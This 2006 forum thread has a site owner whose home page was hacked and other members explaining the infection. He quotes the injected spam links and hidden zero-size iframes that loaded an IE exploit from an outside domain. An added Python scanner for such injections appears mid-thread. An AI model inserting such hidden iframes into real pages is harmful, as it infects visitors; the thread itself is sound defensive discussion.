Viruses on website - help & questions (Full Version)

All Forums >> [Web Development] >> Server Issues





RickP -> Viruses on website - help & questions (10/16/2006 12:30:29)

Hi - it's been a while since I've posted here - no particular reason - but today I urgently need some help and advice...

A few weeks back I accessed my site from someone's PC and their virus scanner immediately blocked a virus. I wasn't sure if it related to my site or not but just a short while after it happened again! I contacted the hosts who assured me that all was clear. Today I have had a call from someone informing me that the site has several viruses - detected by their AV.

I have left a message with the hosts but am wondering if there is anything else I can do?

Here's a question first... Does this mean that my site in particular is infected or is the whole server infected and the same would be happening to all sites on that server?

Anyhow, any help, information and advice would be appreciated.




Spooky -> RE: Viruses on website - help & questions (10/16/2006 14:30:09)

Do you have any more details on the detected virus?




jaybee -> RE: Viruses on website - help & questions (10/16/2006 16:49:36)

Find out from all of them which AV they're using. If your host says it's clean and they're all using the same one, suspect false positives.




BobbyDouglas -> RE: Viruses on website - help & questions (10/16/2006 18:47:41)

Unix/linux web hosts don't run the normal batch of AV software that most consumers are used to.

The best thing to do is ask your host for a zip of the entire hosting account (even the stuff located below the public_html and www folders). Then use your AV to scan the zip file.




RickP -> RE: Viruses on website - help & questions (10/17/2006 3:42:58)

Thanks to all for the useful replies

I've just accessed the site and my AV caught this...

The JScript/Ludvc.1ip!Trojan was detected in C:\DOCUMENTS AND SETTINGS\RICK\LOCAL 
SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\OF93A2JT\TEST[1].HTM.
Machine: MAXX, User: MAXX\Rick.
File Status: File was cured; system cure performed.




RickP -> RE: Viruses on website - help & questions (10/17/2006 3:49:38)

The home page has been hacked and the code below inserted

quote:

<a href="http://www.ivorysky.com/img/flags/10px/company_uniform.html">company uniform</a>
<a href="http://www.ivorysky.com/img/flags/10px/postal_trucks_for_sale.html">trucks for sale</a>
<a href="http://www.ivorysky.com/img/flags/10px/usmc_wwii_uniforms.html">wwii uniforms</a>
<a href="http://www.ivorysky.com/img/flags/10px/for_sale_aluma_laser.html">aluma laser</a>
<a href="http://www.ivorysky.com/img/flags/10px/bad_credit_home_purchase_loan.html">bad credit home loan</a>
<a href="http://www.ivorysky.com/img/flags/10px/terra_travel.html">terra travel</a>


Also this (which was the problem before). Warning: the following links below may contain a virus.

quote:

<iframe src="http://www.isecurepages.net/out.php?s_id=1" width=0 height=0></iframe>
<iframe src="http://www.isecurepages.net/out.php?s_id=1" width=0 height=0></iframe>




jaybee -> RE: Viruses on website - help & questions (10/17/2006 5:51:25)

Looking at that and doing some checking...

The first one, ivorysky, is local to me so I could go round and break his legs for you. BUT, I don't think it's him. All the links are 404 and having checked his site it looks to me like he got hacked too and a folder of banners inserted. They've now gone. Check your site to make sure there are no new folders appearing.

The second one however is Russian. Oh surprise, surprise.

Domain Name: ISECUREPAGES.NET

Registrant:
hcenter
Petrov Vladimir Vladimirovich hcenter@list.ru
ul. Lenina, d. 20, kv.5
Moskva
Moskva,111111
RU
Tel. +7.1111111111

Now he's obviously got in via a security hole. What PHP scripts are you running?




BobbyDouglas -> RE: Viruses on website - help & questions (10/17/2006 9:34:05)

Most likely a bot just scanned your website and found a very outdated script. You really won't even be able to tell that you have been hacked until you get the virus warnings. I would 1) find out how the person came in 2) correct the hole 3) revert back to a backup before you were hacked

As long as your database is displaying the correct data, then you should be able to back up the database (on the hacked site) and then restore all html/php/asp files and then use the latest database. Every case I have seen where the database still displays normal data, it has not been tampered with. You still take a chance though restoring that db.

If you are with a good host, they should help you out a bit in terms of getting everything resolved.




RickP -> RE: Viruses on website - help & questions (10/17/2006 12:26:33)

Bobby...

Thanks for the sensible edit to my post - re virus warnings related to the URLs, and for the further suggestions. I wonder, would it be best to delete the entire site and just upload it again?

Jaybee...

Yes, the PHP contact form could be a weak spot (?). I spent a lot of time seeking out a 'secure' type form to use as a basis for it but I cannot properly judge as my PHP knowledge is limited to adapting pre-written scripts only. Do you know which is the 'best' script available? I notice that a lot of forms are now using a graphic with disguised numbers/letters to enter, which are not machine readable, but I suppose that will only stop automated attacks and not someone who wants to abuse the form in person, so to speak.


I have some further info from my hosts...

quote:

There was a problem a few weeks ago whereby code was added to some sites on some of our servers. This was possible due to a cPanel exploit that has since been patched by cPanel...

...the virus on the web site tries to exploit a security hole in IE, the VML exploit, but this has since been patched by Microsoft...


I'm really fed up today [>:]


Oh, P.S. Jaybee, you're very sweet, offering to break legs and all that - not really necessary but it's a much appreciated sentiment [;)]




jaybee -> RE: Viruses on website - help & questions (10/17/2006 12:42:37)

quote:

Do you know which is the 'best' script available?
It's unlikely they can get in via a form but go to the CSS Forum and there's a post on there from Mike Cherim about a secure accessible form he's been working on. You can download it all free from his site, there are great instructions on the page as well. If you get any problems I'm sure he'd be happy to hear from you.

quote:

This was possible due to a cPanel exploit that has since been patched by cPanel...
Then that is not your problem, well the aftermath is but the original hole isn't. Still go get Mike's form though. [:D]

My site got whacked via phpBB and along with many thousands of others, all the pages were defaced. I wiped the lot then reloaded the entire site.

quote:

a problem a few weeks ago
!!! and they didn't think to mention it! I'd get round the entire problem by getting a new host.




RickP -> RE: Viruses on website - help & questions (10/17/2006 12:54:11)

quote:

It's unlikely they can get in via a form


I'd like to hope so - but I'm sure they somehow use (abuse) forms for sending spam - again, not sure how but it would be great to have a truly secure form. I'll check that one out [;)]




RickP -> RE: Viruses on website - help & questions (10/17/2006 12:55:45)

BTW... anyone...

Are the inserted code and the virus two issues or one?




BobbyDouglas -> RE: Viruses on website - help & questions (10/17/2006 14:17:26)

Just curious, who was hosting that website for ya?

quote:

Are the inserted code and the virus two issues or one?

- Two issues. The inserted code was done via an exploit. The code then inserts an iframe that links to ANOTHER page that contains the actual virus.




RickP -> RE: Viruses on website - help & questions (10/18/2006 15:49:09)

quote:

Two issues. The inserted code was done via an exploit. The code then inserts an iframe that links to ANOTHER page that contains the actual virus.


Ah, I see, so the virus itself is not on my server - right?

Is the whole point just to spread a virus?

Or is the goal to raise G rankings with the links but the virus just happens to be on one of the linked sites?

If no-one sees or activates the links how can the virus come from the other site(s)? Or is the virus only on the page linked to in the iframe, which is automatically therefore activated as part of reading the iframe?

questions, questions, I know, but this would be good to know - thanks!




BobbyDouglas -> RE: Viruses on website - help & questions (10/18/2006 23:51:28)

quote:

Ah, I see, so the virus itself is not on my server - right?

- It is most likely NOT on your actual server. There could also be viruses on your server, but the one we're talking about here is not on your server.

quote:

Is the whole point just to spread a virus?

- Yes

quote:

If no-one sees or activates the links how can the virus come from the other site(s)? Or is the virus only on the page linked to in the iframe, which is automatically therefore activated as part of reading the iframe?

- It isn't a link. Basically, you have an iframe (that was most likely inserted by an exploit), that calls on a page at another website, and that page that it is calling has the virus. The virus appears to be an IE exploit. When you try to view the source of the page, it only shows an encrypted piece of javascript.

Btw, if you are running a site that is generating income, it might be a good idea to ditch the cheap host.
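A defender-side check for the two injection patterns posted earlier in this thread (hidden zero-size iframes pointing off-site, and a cluster of off-site spam links dropped into the home page). This is an added example, not code from the thread or any of its participants; the site host name and the sample page with its placeholder domains are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class InjectedContentScanner(HTMLParser):
    """Collects hidden iframes and counts off-site anchors in one HTML document."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []       # (kind, detail) for suspicious iframes
        self.offsite_links = {}  # host -> number of <a> tags pointing there

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases names
        if tag == "iframe":
            src = a.get("src", "")
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (a.get("width", "") in ("0", "0px") or a.get("height", "") in ("0", "0px")
                      or "display:none" in style or "visibility:hidden" in style)
            host = (urlparse(src).hostname or "").lower()
            if hidden:
                self.findings.append(("hidden-iframe", src))
            elif host and host != self.site_host:
                self.findings.append(("offsite-iframe", src))
        elif tag == "a":
            host = (urlparse(a.get("href", "")).hostname or "").lower()
            if host and host != self.site_host:
                self.offsite_links[host] = self.offsite_links.get(host, 0) + 1

def scan_html(html, site_host, link_threshold=5):
    """Return a list of (kind, detail) findings for one page; an empty list means clean."""
    parser = InjectedContentScanner(site_host)
    parser.feed(html)
    parser.close()
    findings = list(parser.findings)
    for host, count in parser.offsite_links.items():
        if count >= link_threshold:  # many links to one foreign host: link-farm injection
            findings.append(("link-farm", f"{host} ({count} links)"))
    return findings

# Constructed sample page: legitimate content plus both injection patterns (placeholder domains).
SAMPLE_HTML = """<html><body><h1>Welcome</h1><a href="/about.html">About us</a>
<a href="http://spam-links.example/a/company_uniform.html">company uniform</a><a href="http://spam-links.example/a/trucks_for_sale.html">trucks for sale</a>
<a href="http://spam-links.example/a/wwii_uniforms.html">wwii uniforms</a><a href="http://spam-links.example/a/aluma_laser.html">aluma laser</a>
<a href="http://spam-links.example/a/home_loan.html">bad credit home loan</a><a href="http://spam-links.example/a/terra_travel.html">terra travel</a>
<iframe src="http://malicious.example/out.php?s_id=1" width=0 height=0></iframe><iframe src="http://malicious.example/out.php?s_id=1" width=0 height=0></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML, "mysite.example"):
        print(f"{kind}: {detail}")
```

Run it over every .html/.php file pulled from the hosting account and diff the findings against a known-clean backup; a zero-size iframe is never needed for legitimate layout, so any hit is worth a manual look.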




RickP -> RE: Viruses on website - help & questions (10/19/2006 7:48:14)

Thanks Bobby, that clarifies a lot [;)]



